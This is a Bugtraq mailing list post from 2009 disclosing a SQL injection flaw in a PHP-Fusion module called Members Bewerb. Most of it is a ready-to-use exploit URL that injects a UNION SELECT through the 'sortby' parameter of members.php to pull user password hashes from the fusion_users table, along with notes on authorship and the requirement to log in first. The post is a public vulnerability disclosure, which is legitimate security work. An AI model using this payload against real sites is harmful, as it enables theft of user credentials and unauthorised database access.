|
Bugtraq
mailing list archives
PHP-Fusion Mod Members Bewerb Sql Injection
From: r3d.w0rm () yahoo com
Date: Wed, 7 Jan 2009 04:49:55 -0700
#####################################################################################
#### PHP-Fusion Mod Members Bewerb Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
# #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=204
# #
#Dork : :( #
# #
#####################################################################################
# [Bug] #
# #
#http://Site/[path]/members.php?sortby=%'%20union%20select%200,user_password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20fusion_users/*
# #
#You must login then use bug . #
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
 By Date 
By Thread
Current thread:
- PHP-Fusion Mod Members Bewerb Sql Injection r3d . w0rm (Jan 07)
|
Intro
